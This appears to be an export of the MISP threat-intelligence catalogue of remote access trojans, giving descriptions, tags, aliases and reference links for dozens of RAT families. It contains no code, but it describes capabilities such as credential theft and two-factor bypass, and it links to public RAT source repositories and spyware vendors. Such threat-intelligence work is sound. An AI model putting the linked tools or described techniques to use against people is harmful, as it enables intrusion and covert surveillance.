The tag is: `misp-galaxy:rat="Crimson"

Crimson has relationships with:

- similar: `misp-galaxy:mitre-malware="Crimson - S0115"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="Crimson"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Crimson RAT"` with `estimative-language:likelihood-probability="likely"

### KjW0rm

The tag is: `misp-galaxy:rat="KjW0rm"

KjW0rm has relationships with:

- similar: `misp-galaxy:tool="KjW0rm"` with `estimative-language:likelihood-probability="likely"`
Ghost

The tag is: `misp-galaxy:rat="Ghost"`

Ghost is also known as:

- Ucul

Table 5786. Table References

9002

The tag is: `misp-galaxy:rat="9002"`

Sandro RAT

The tag is: `misp-galaxy:rat="Sandro RAT"`

Mega

The tag is: `misp-galaxy:rat="Mega"`

WiRAT

The tag is: `misp-galaxy:rat="WiRAT"`

3PARA RAT

The tag is: `misp-galaxy:rat="3PARA RAT"`

3PARA RAT has relationships with:

- similar: `misp-galaxy:mitre-malware="3PARA RAT - S0066"` with `estimative-language:likelihood-probability="likely"`

Table 5787. Table References
**BBS RAT**

The tag is: `misp-galaxy:rat="BBS RAT"`

**Konni**

KONNI is a remote access Trojan (RAT) that was first reported in May of 2017, but is believed to have been in use for over 3 years. As part of our daily threat monitoring, FortiGuard Labs came across a new variant of the KONNI RAT and decided to take a deeper look.

The tag is: `misp-galaxy:rat="Konni"`

Konni is also known as:

- KONNI

Konni has relationships with:

- similar: `misp-galaxy:tool="KONNI"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Konni"` with `estimative-language:likelihood-probability="likely"

Table 5788. Table References

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**Felismus RAT**

Used by Sowbug

The tag is: `misp-galaxy:rat="Felismus RAT"`

Table 5789. Table References

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</table>

**Xsser**

Xsser mRAT is a piece of malware that targets iOS devices that have software limitations removed. The app is installed via a rogue repository on Cydia, the most popular third-party application store
for jailbroken iPhones. Once the malicious bundle has been installed and executed, it gains persistence - preventing the user from deleting it. The mRAT then makes server-side checks and proceeds to steal data from the user’s device and executes remote commands as directed by its command-and-control (C2) server.

The tag is: *misp-galaxy:rat="Xsser"*

Xsser is also known as:

- **mRAT**

*Table 5790. Table References*

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<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://malware.wikia.com/wiki/Xsser_mRAT">http://malware.wikia.com/wiki/Xsser_mRAT</a></td>
</tr>
</tbody>
</table>

**GovRAT**

GovRAT is an old cyberespionage tool, it has been in the wild since 2014 and it was used by various threat actors across the years.

The tag is: *misp-galaxy:rat="GovRAT"*

GovRAT has relationships with:

- similar: **misp-galaxy:malpedia="GovRAT"** with **estimative-language:likelihood-probability="likely"**

*Table 5791. Table References*

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<tr>
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<tbody>
<tr>
<td><a href="http://securityaffairs.co/wordpress/41714/cyber-crime/govrat-platform.html">http://securityaffairs.co/wordpress/41714/cyber-crime/govrat-platform.html</a></td>
</tr>
</tbody>
</table>

**Rottie3**

The tag is: *misp-galaxy:rat="Rottie3"*

*Table 5792. Table References*

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<tr>
<td><a href="https://www.youtube.com/watch?v=jUg5%E2%80%9468Iqs">https://www.youtube.com/watch?v=jUg5—68Iqs</a></td>
</tr>
</tbody>
</table>

**Killer RAT**

The tag is: *misp-galaxy:rat="Killer RAT"*
Hi-Zor

The tag is: `misp-galaxy:rat="Hi-Zor"`

Hi-Zor has relationships with:

- similar: `misp-galaxy:mitre-malware="Hi-Zor - S0087"` with `estimative-language:likelihood-probability="likely"`

**Table 5793. Table References**

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Quaverse

Quaverse RAT or QRAT is a fairly new Remote Access Tool (RAT) introduced in May 2015. This RAT is marketed as an undetectable Java RAT. As you might expect from a RAT, the tool is capable of grabbing passwords, key logging and browsing files on the victim's computer. On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.

The tag is: `misp-galaxy:rat="Quaverse"`

Quaverse is also known as:

- QRAT

**Table 5794. Table References**

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Heseber

The tag is: `misp-galaxy:rat="Heseber"`

Cardinal

Cardinal is a remote access trojan (RAT) discovered by Palo Alto Networks in 2017 and has been active for over two years. It is delivered via a downloader, known as Carp, and uses malicious macros in Microsoft Excel documents to compile embedded C# programming language source code into an executable that runs and deploys the Cardinal RAT. The malicious Excel files use different tactics to get the victims to execute it.

The tag is: `misp-galaxy:rat="Cardinal"`

Cardinal has relationships with:
• similar: misp-galaxy:tool="EVILNUM" with estimative-language:likelihood-probability="likely"

Table 5795. Table References

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<tr>
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<tbody>
<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/">https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/</a></td>
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<tr>
<td><a href="https://www.scmagazine.com/cardinal-rats-unique-downloader-allowed-it-to-avoid-detection-for-years/article/651927/">https://www.scmagazine.com/cardinal-rats-unique-downloader-allowed-it-to-avoid-detection-for-years/article/651927/</a></td>
</tr>
<tr>
<td><a href="https://www.cyber.nj.gov/threat-profiles/trojan-variants/cardinal">https://www.cyber.nj.gov/threat-profiles/trojan-variants/cardinal</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/">https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/</a></td>
</tr>
</tbody>
</table>

OmniRAT

Works on all Android, Windows, Linux and Mac devices!

The tag is: misp-galaxy:rat="OmniRAT"

OmniRAT has relationships with:

• similar: misp-galaxy:malpedia="OmniRAT" with estimative-language:likelihood-probability="likely"

Table 5796. Table References

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<tbody>
<tr>
<td><a href="https://omnirat.eu/en/">https://omnirat.eu/en/</a></td>
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Jfect

The tag is: misp-galaxy:rat="Jfect"

Table 5797. Table References

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<tbody>
<tr>
<td><a href="https://www.youtube.com/watch?v=qKdoExQFb68">https://www.youtube.com/watch?v=qKdoExQFb68</a></td>
</tr>
</tbody>
</table>

Trochilus

Trochilus is a remote access trojan (RAT) first identified in October 2015 when attackers used it to infect visitors of a Myanmar website. It was then used in a 2016 cyber-espionage campaign, dubbed "the Seven Pointed Dagger," managed by another group, "Group 27," who also uses the PlugX trojan. Trochilus is primarily spread via emails with a malicious .RAR attachment containing the malware. The trojan’s functionality includes a shellcode extension, remote uninstall, a file manager, and the ability to download and execute, upload and execute, and access the system information. Once present on a system, Trochilus can move laterally in the network for better access. This trojan operates in memory only and does not write to the disk, helping it evade detection.
The tag is: misp-galaxy:rat="Trochilus"

Trochilus has relationships with:

- similar: misp-galaxy:tool="Trochilus" with estimative-language:likelihood-probability="likely"

Table 5798. Table References

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**Matryoshka**

Their most commonly used initial attack vector is a simple, yet alarmingly effective, spearphishing attack, infecting unsuspecting victims via a malicious email attachment (usually an executable that has been disguised as something else). From there, Matryoshka runs second stage malware via a dropper and covertly installs a Remote Access Toolkit (RAT). This is done using a reflective loader technique that allows the malware to run in process memory, rather than being written to disk. This not only hides the install of the RAT but also ensures that the RAT will be ‘reinstalled’ after system restart.

The tag is: misp-galaxy:rat="Matryoshka"

Matryoshka has relationships with:

- similar: misp-galaxy:tool="Matryoshka" with estimative-language:likelihood-probability="likely"

Table 5799. Table References

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**Mangit**

First discovered by Trend Micro in June, Mangit is a new malware family being marketed on both the Dark web and open internet. Users have the option to rent the trojan’s infrastructure for about $600 per 10-day period or buy the source code for about $8,800. Mangit was allegedly developed by "Ric", a Brazilian hacker, who makes himself available via Skype to discuss rental agreements. Once the malware is rented or purchased, the user controls a portion of the Mangit botnet, the trojan, the dropper, an auto-update system, and the server infrastructure to run their attacks. Mangit contains support for nine Brazilian banks including Citibank, HSBC, and Santander. The malware can also be used to steal user PayPal credentials. Mangit has the capability to collect banking credentials, receive SMS texts when a victim is accessing their bank account, and take over victim’s browsers. To circumvent two-factor authentication, attackers can use Mangit to lock victim’s browsers and push pop-ups to the victim asking for the verification code they just received.
The tag is: *misp-galaxy:rat="Mangit"*

**Table 5800. Table References**

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**LeGeNd**

The tag is: *misp-galaxy:rat="LeGeNd"*

**Table 5801. Table References**

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**Revenge-RAT**

Revenge v0.1 was a simple tool, according to a researcher known as Rui, who says the malware's author didn't bother obfuscating the RAT's source code. This raised a question mark with the researchers, who couldn't explain why VirusTotal scanners couldn't pick it up as a threat right away. Revenge, which was written in Visual Basic, also didn't feature too many working features, compared to similar RATs. Even Napoleon admitted that his tool was still in the early development stages, a reason why he provided the RAT for free.

The tag is: *misp-galaxy:rat="Revenge-RAT"*

**Table 5802. Table References**

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**vjw0rm 0.1**

The tag is: *misp-galaxy:rat="vjw0rm 0.1"*

**Table 5803. Table References**

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3340
**rokrat**

ROKRAT is a remote access trojan (RAT) that leverages a malicious Hangual Word Processor (HWP) document sent in spearphishing emails to infect hosts. The HWP document contains an embedded Encapsulated PostScript (EPS) object. The object exploits an EPS buffer overflow vulnerability and downloads a binary disguised as a .JPG file. The file is then decoded and the ROKRAT executable is initiated. The trojan uses legitimate Twitter, Yandex, and Mediafire websites for its command and control communications and exfiltration platforms, making them difficult to block globally. Additionally, the platforms use HTTPS connections, making it more difficult to gather additional data on its activities. Cisco's Talos Group identified two email campaigns. In one, attackers send potential victims emails from an email server of a private university in Seoul, South Korea with a sender email address of "kgf2016@yonsei.ac.kr," the contact email for the Korea Global Forum, adding a sense of legitimacy to the email. It is likely that the email address was compromised and used by the attackers in this campaign. The second is less sophisticated and sends emails claiming to be from a free Korean mail service with a the subject line, "Request Help" and attached malicious HWP filename, "I'm a munchon person in Gangwon-do, North Korea." The ROKRAT developer uses several techniques to hinder analysis, including identifying tools usually used by malware analysts or within sandbox environments. Once it has infected a device, this trojan can execute commands, move a file, remove a file, kill a process, download and execute a file, upload documents, capture screenshots, and log keystrokes. Researchers believe the developer is a native Korean speaker and the campaign is currently targeting Korean-speakers.

The tag is: `misp-galaxy:rat="rokrat"`

rokrat is also known as:

- ROKRAT

Table 5804. Table References

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**Qarallax**

Travelers applying for a US Visa in Switzerland were recently targeted by cyber-criminals linked to a malware called QRAT. Twitter user @hkashfi posted a Tweet saying that one of his friends received a file (US Travel Docs Information.jar) from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland (notice the “i” between “travel” and “docs”).

The tag is: `misp-galaxy:rat="Qarallax"`

Qarallax is also known as:

- qrat

Qarallax has relationships with:
**MoonWind**

MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.

The tag is: `misp-galaxy:rat="MoonWind"`

MoonWind has relationships with:

- similar: `misp-galaxy:mitre-malware="MoonWind - S0149"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:tool="MoonWind"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="MoonWind"` with `estimative-language:likelihood-probability="likely"`

**Remcos**

Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, we’ve seen its payload being distributed in the wild for the first time.

The tag is: `misp-galaxy:rat="Remcos"`

Remcos has relationships with:

- similar: `misp-galaxy:malpedia="Remcos"` with `estimative-language:likelihood-probability="likely"`

**Table 5805. Table References**

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<tr>
<td><a href="https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/">https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/</a></td>
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**Table 5806. Table References**

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<tr>
<td><a href="https://attack.mitre.org/wiki/Software/S0149">https://attack.mitre.org/wiki/Software/S0149</a></td>
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**Table 5807. Table References**

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<tr>
<td><a href="https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2">https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2</a></td>
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</table>
Client Maximus

The purpose of the Client Maximus malware is financial fraud. As such, its code aspires to create the capabilities that most banking Trojans have, which allow attackers to monitor victims' web navigation and interrupt online banking session at will. After taking over a victim's banking session, an attacker operating this malware can initiate a fraudulent transaction from the account and use social engineering screens to manipulate the unwitting victim into authorizing it.

The tag is: misp-galaxy:rat="Client Maximus"

Client Maximus has relationships with:

• similar: misp-galaxy:malpedia="Client Maximus" with estimative-language:likelihood-probability="likely"

Table 5808. Table References

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TheFat RAT

Thefatrat a massive exploiting tool revealed >> An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most...

The tag is: misp-galaxy:rat="TheFat RAT"

Table 5809. Table References

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<tr>
<td><a href="https://github.com/Screetsec/TheFatRat">https://github.com/Screetsec/TheFatRat</a></td>
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</table>

RedLeaves

Since around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by malware ‘RedLeaves’. It is a new type of malware which has been observed since 2016 in attachments to targeted emails.

The tag is: misp-galaxy:rat="RedLeaves"

RedLeaves has relationships with:

• similar: misp-galaxy:mitre-malware="RedLeaves - S0153" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:tool="BUGJUICE" with estimative-language:likelihood-probability="likely"
Rurktar

Dubbed Rurktar, the tool hasn't had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers users, and steal or upload files.

The tag is: `misp-galaxy:rat="Rurktar"`

Rurktar has relationships with:

• similar: `misp-galaxy:malpedia="Rurktar"` with `estimative-language:likelihood-probability="likely"`

RATAttack

RATAttack is a remote access trojan (RAT) that uses the Telegram protocol to support encrypted communication between the victim's machine and the attacker. The Telegram protocol also provides a simple method to communicate to the target, negating the need for port forwarding. Before using RATAttack, the attacker must create a Telegram bot and embed the bot's Telegram token into the trojan’s configuration file. When a system is infected with RATAttack, it connects to the bot's Telegram channel. The attacker can then connect to the same channel and manage the RATAttack clients on the infected host machines. The trojan's code was available on GitHub then was taken down by the author on April 19, 2017.

The tag is: `misp-galaxy:rat="RATAttack"`

KhRAT

So called because the Command and Control (C2) infrastructure from previous variants of the
malware was located in Cambodia, as discussed by Roland Dela Paz at Forepoint here, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.

The tag is: misp-galaxy:rat="KhrAT"

Table 5813. Table References

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**RevCode**

The tag is: misp-galaxy:rat="RevCode"

Table 5814. Table References

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<tr>
<td><a href="https://revcode.eu/">https://revcode.eu/</a></td>
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</table>

**AhNyth Android**

Android Remote Administration Tool

The tag is: misp-galaxy:rat="AhNyth Android"

Table 5815. Table References

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<tbody>
<tr>
<td><a href="https://github.com/AhMyth/AhMyth-Android-RAT">https://github.com/AhMyth/AhMyth-Android-RAT</a></td>
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</table>

**Socket23**

Socket23 was launched from his web site and immediately infected major French corporations between August and October 1998. The virus (distributing the Trojan) was known as W32/HLLP.DeTroie.A (alias W32/Cheval.TCV). Never had a virus so disrupted French industry. The author quickly offered his own remover and made his apologies on his web site (now suppressed). Jean-Christophe X (18) was arrested on Tuesday 15 June 1999 in the Paris area and placed under judicial investigation for ‘fraudulent intrusion of data in a data processing system, suppression and fraudulent modification of data’

The tag is: misp-galaxy:rat="Socket23"

Table 5816. Table References

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</table>
PowerRAT

The tag is: misp-galaxy:rat="PowerRAT"

MacSpy

Standard macOS backdoor, offered via a 'malware-as-a-service' model. MacSpy is advertised as the "most sophisticated Mac spyware ever", with the low starting price of free. While the idea of malware-as-a-service (MaaS) isn't a new one with players such as Tox and Shark the game, it can be said that MacSpy is one of the first seen for the OS X platform.

The tag is: misp-galaxy:rat="MacSpy"

MacSpy has relationships with:

- similar: misp-galaxy:malpedia="MacSpy" with estimative-language:likelihood-probability="likely"

Table 5817. Table References

Links

https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service
https://objective-see.com/blog/blog_0x25.html

DNSMessenger

Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT. The use of multiple stages of Powershell with various stages being completely fileless indicates an attacker who has taken significant measures to avoid detection.

The tag is: misp-galaxy:rat="DNSMessenger"

DNSMessenger has relationships with:

- similar: misp-galaxy:mitre-malware="TEXTMATE - S0146" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:mitre-malware="POWERSOURCE - S0145" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

Table 5818. Table References
PentagonRAT

The tag is: `misp-galaxy:rat="PentagonRAT"`

NewCore

NewCore is a remote access trojan first discovered by Fortinet researchers while conducting analysis on a China-linked APT campaign targeting Vietnamese organizations. The trojan is a DLL file, executed after a trojan downloader is installed on the targeted machine. Based on strings in the code, the trojan may be compiled from the publicly-available source code of the PcClient and PcCortr backdoor trojans.

The tag is: `misp-galaxy:rat="NewCore"`

Deeper RAT

The tag is: `misp-galaxy:rat="Deeper RAT"`

Xyligan

The tag is: `misp-galaxy:rat="Xyligan"`

H-w0rm

The tag is: `misp-galaxy:rat="H-w0rm"

htpRAT

On November 8, 2016 a non-disclosed entity in Laos was spear-phished by a group closely related to known Chinese adversaries and most likely affiliated with the Chinese government. The attackers
utilized a new kind of Remote Access Trojan (RAT) that has not been previously observed or reported. The new RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming. htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in the Chinese adversary's arsenal in a campaign against Association of Southeast Asian Nations (ASEAN). Most RATs can log keystrokes, take screenshots, record audio and video from a webcam or microphone, install and uninstall programs and manage files. They support a fixed set of commands operators can execute using different command IDs—'file download' or 'file upload,' for example—and must be completely rebuilt to have different functionality. htpRAT, on the other hand, serves as a conduit for operators to do their job with greater precision and effect. On the Command and Control (C2) server side, threat actors can build new functionality in commands, which can be sent to the malware to execute. This capability makes htpRAT a small, agile, and incredibly dynamic piece of malware. Operators can change functionality, such as searching for a different file on the victim's network, simply by wrapping commands.

The tag is: misp-galaxy:rat="htpRAT"

htpRAT has relationships with:

- similar: misp-galaxy:malpedia="htpRAT" with estimative-language:likelihood-probability="likely"

Table 5821. Table References

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**FALLCHILL**

According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim's system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.

The tag is: misp-galaxy:rat="FALLCHILL"

FALLCHILL has relationships with:

- similar: misp-galaxy:mitre-malware="FALLCHILL - S0181" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"
UBoatRAT

Alto Networks Unit 42 has identified attacks with a new custom Remote Access Trojan (RAT) called UBoatRAT. The initial version of the RAT, found in May of 2017, was simple HTTP backdoor that uses a public blog service in Hong Kong and a compromised web server in Japan for command and control. The developer soon added various new features to the code and released an updated version in June. The attacks with the latest variants we found in September have following characteristics. Targets personnel or organizations related to South Korea or video games industry Distributes malware through Google Drive Obtains C2 address from GitHub Uses Microsoft Windows Background Intelligent Transfer Service (BITS) to maintain persistence.

The tag is: `misp-galaxy:rat="UBoatRAT"`

CrossRat

The EFF/Lookout report describes CrossRat as a “newly discovered desktop surveillanceware tool...which is able to target Windows, OSX, and Linux.”

The tag is: `misp-galaxy:rat="CrossRat"`

TSCookieRAT

TSCookie provides parameters such as C&C server information when loading TSCookieRAT. Upon the execution, information of the infected host is sent with HTTP POST request to an external server. (The HTTP header format is the same as TSCookie.) The data is RC4-encrypted from the beginning to 0x14 (the key is Date header value), which is followed by the information of the infected host (host name, user name, OS version, etc.). Please refer to Appendix C, Table C-1 for the data format.

The tag is: `misp-galaxy:rat="TSCookieRAT"`
Coldroot

Coldroot, a remote access trojan (RAT), is still undetectable by most antivirus engines, despite being uploaded and freely available on GitHub for almost two years. The RAT appears to have been created as a joke, "to Play with Mac users," and "give Mac it's rights in this [the RAT] field," but has since expanded to work all three major desktop operating systems — Linux, macOS, and Windows— according to a screenshot of its builder extracted from a promotional YouTube video.

The tag is: misp-galaxy:rat="Coldroot"

Comnie

Comnie is a RAT originally identified by Sophos. It has been using Github, Tumbler and Blogspot as covert channels for its C2 communications. Comnie has been observed targetting government, defense, aerospace, high-tech and telecommunication sectors in Asia.

The tag is: misp-galaxy:rat="Comnie"

GravityRAT

GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We've seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor.

The tag is: misp-galaxy:rat="GravityRAT"
ARS VBS Loader

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim's machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious "loaders".

The tag is: `misp-galaxy:rat="ARS VBS Loader"`

ARS VBS Loader has relationships with:

- similar: `misp-galaxy:malpedia="ARS VBS Loader"` with `estimative-language:likelihood-probability="likely"

RadRAT

RadRAT, its capabilities include: unfettered control of the compromised computer, lateral movement across the organization (Mimikatz-like credentials harvesting, NTLM hash harvesting from the Windows registry and implementation of the Pass-the-Hash attack on SMB connections) and rootkit-like detection-evasion mechanisms.

The tag is: `misp-galaxy:rat="RadRAT"`

RadRAT has relationships with:

- similar: `misp-galaxy:malpedia="RadRAT"` with `estimative-language:likelihood-probability="likely"

FlawedAmmyy

FlawedAmmyy, has been used since the beginning of 2016 in both highly targeted email attacks as
well as massive, multi-million message campaigns. The RAT is based on leaked source code for Version 3 of the Ammyy Admin remote desktop software. As such FlawedAmmyy contains the functionality of the leaked version, including: Remote Desktop control, File system manager, Proxy support, Audio Chat.

The tag is: misp-galaxy:rat="FlawedAmmyy"

FlawedAmmyy has relationships with:

- similar: misp-galaxy:malpedia="FlawedAmmyy" with estimative-language:likelihood-probability="likely"

Table 5831. Table References

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### Spymaster Pro

Monitoring Software

The tag is: misp-galaxy:rat="Spymaster Pro"

Table 5832. Table References

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<tbody>
<tr>
<td><a href="https://www.spymasterpro.com/">https://www.spymasterpro.com/</a></td>
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<tr>
<td><a href="https://spycellphone.mobi/reviews/spymaster-pro-real-review-with-screenshots">https://spycellphone.mobi/reviews/spymaster-pro-real-review-with-screenshots</a></td>
</tr>
</tbody>
</table>

### NavRAT

Classic RAT that can download, upload, execute commands on the victim host and perform keylogging. However, the command and control (C2) infrastructure is very specific. It uses the legitimate Naver email platform in order to communicate with the attackers via email

The tag is: misp-galaxy:rat="NavRAT"

NavRAT has relationships with:

- similar: misp-galaxy:malpedia="NavRAT" with estimative-language:likelihood-probability="likely"

Table 5833. Table References

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<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://blog.talosintelligence.com/2018/05/navrat.html">https://blog.talosintelligence.com/2018/05/navrat.html</a></td>
</tr>
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3352
joanap

Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device.

The tag is: misp-galaxy:rat="joanap"

Table 5834. Table References

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<tr>
<td><a href="https://www.us-cert.gov/ncas/alerts/TA18-149A">https://www.us-cert.gov/ncas/alerts/TA18-149A</a></td>
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</table>

Sisfader

Sisfader maintains persistence installing itself as a system service, it is made up of multiple components ([1] Dropper - installing the malware, [2] Agent - main code of the RAT, [3] Config - written to the registry, [4] Auto Loader - responsible for extracting the Agent, the Config from the registry) and it has its own custom protocol for communication.

The tag is: misp-galaxy:rat="Sisfader"

Sisfader has relationships with:

- similar: misp-galaxy:malpedia="Sisfader" with estimative-language:likelihood-probability="likely"

Table 5835. Table References

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SocketPlayer

The RAT is written in .NET, it uses socket.io for communication. Currently there are two variants of the malware, the 1st variant is a typical downloader whereas the 2nd one has download and C2 functionalities.

The tag is: misp-galaxy:rat="SocketPlayer"

Table 5836. Table References

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Hallaj PRO RAT

RAT

The tag is: misp-galaxy:rat="Hallaj PRO RAT"

Table 5837. Table References

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NukeSped

This threat can install other malware on your PC, including Trojan:Win32/NukeSped.B!dha and Trojan:Win32/NukeSped.C!dha. It can show you a warning message that says your files will be made publically available if you don’t follow the malicious hacker’s commands.

The tag is: misp-galaxy:rat="NukeSped"

Table 5838. Table References

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<tr>
<td><a href="https://malwarefixes.com/threats/win32nukesped/">https://malwarefixes.com/threats/win32nukesped/</a></td>
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TheOneSpy

Remotely monitor and control any wrong activity of kids on all smartphones & computers

The tag is: misp-galaxy:rat="TheOneSpy"

Table 5839. Table References

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<tr>
<td><a href="https://www.theonespy.com/">https://www.theonespy.com/</a></td>
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</table>
BONDUPDATER

BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization. The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.

The tag is: misp-galaxy:rat="BONDUPDATER"

Table 5840. Table References

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FlawedGrace

Proofpoint also point out that FlawedGrace is a full-featured RAT written in C++ and that it is a very large program that "extensive use of object-oriented and multithreaded programming techniques. "As a consequence, getting familiar with its internal structure takes a lot of time and is far from a simple task.

The tag is: misp-galaxy:rat="FlawedGrace"

Table 5841. Table References

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H-worm

H-worm is a VBS (Visual Basic Script) based RAT written by an individual going by the name Houdini. We believe the author is based in Algeria and has connections to njq8, the author of njw0rm [1] and njRAT/LV [2] through means of a shared or common code base. We have seen the H-worm RAT being employed in targeted attacks against the international energy industry; however, we also see it being employed in a wider context as run of the mill attacks through spammed email attachments and malicious links.

The tag is: misp-galaxy:rat="H-worm"

Table 5842. Table References

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Parasite-HTTP-RAT

The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections. The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.

The tag is: misp-galaxy:rat="Parasite-HTTP-RAT"

Parasite-HTTP-RAT is also known as:

- Parasite HTTP

Caesar RAT

Caesar is an HTTP-based RAT that allows you to remotely control devices directly from your browser.

The tag is: misp-galaxy:rat="Caesar RAT"

FlawedAmmy

During the month of October, Check Point researchers discovered a widespread malware campaign spreading a remote access trojan (dubbed “FlawedAmmy”) that allows attackers to take over victims’ computers and data. The campaign was the latest and most widespread delivering the ‘FlawedAmmyy’ RAT, following a number of campaigns that have spread this malware in recent months. The Trojan allows attackers to gain full access to the machine’s camera and microphone, collect screen grabs, steal credentials and sensitive files, and intrusively monitor the victims’ actions. As a result, FlawedAmmy is the first RAT to enter the Global Threat Index’s top 10 ranking.

The tag is: misp-galaxy:rat="FlawedAmmy"
Felipe

The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user's system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.

The tag is: `misp-galaxy:rat="Felipe"`

Table 5846. Table References

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Amavaldo Banking Trojan

Amavaldo is banking trojan written in Delphi and known to targeting Spanish or Portuguese speaking countries. It contains backdoor functionality and can work as multi stage. Amavaldo also abuses legitimate tools and softwares.

The tag is: `misp-galaxy:rat="Amavaldo Banking Trojan"`

Table 5847. Table References

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AsyncRAT

Open-Source Remote Administration Tool For Windows C# (RAT)

The tag is: `misp-galaxy:rat="AsyncRAT"`

Table 5848. Table References

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp">https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp</a></td>
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<tr>
<td>[<a href="https://malpedia.caad.fkie.fraunhofer.de/details/win">https://malpedia.caad.fkie.fraunhofer.de/details/win</a> asyncrat](<a href="https://malpedia.caad.fkie.fraunhofer.de/details/win">https://malpedia.caad.fkie.fraunhofer.de/details/win</a> asyncrat)</td>
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InnfiRAT

new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine

The tag is: `misp-galaxy:rat="InnfiRAT"`
KeyBase

In the wild since February 2015. The malware comes equipped with a variety of features and can be purchased for $50 directly from the author. It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.

The tag is: `misp-galaxy:rat="KeyBase"`

Warzone

Apparently existing since 2018

The tag is: `misp-galaxy:rat="Warzone"`

SDBbot

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.],dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence. SDBbot is composed of three pieces: an installer, a loader, and a RAT component.

The tag is: `misp-galaxy:rat="SDBbot"`

SDBbot is also known as:

- SDB bot
Sepulcher

A China-based APT has been sending organizations spear-phishing emails that distribute a never-before-seen intelligence-collecting RAT dubbed Sepulcher.

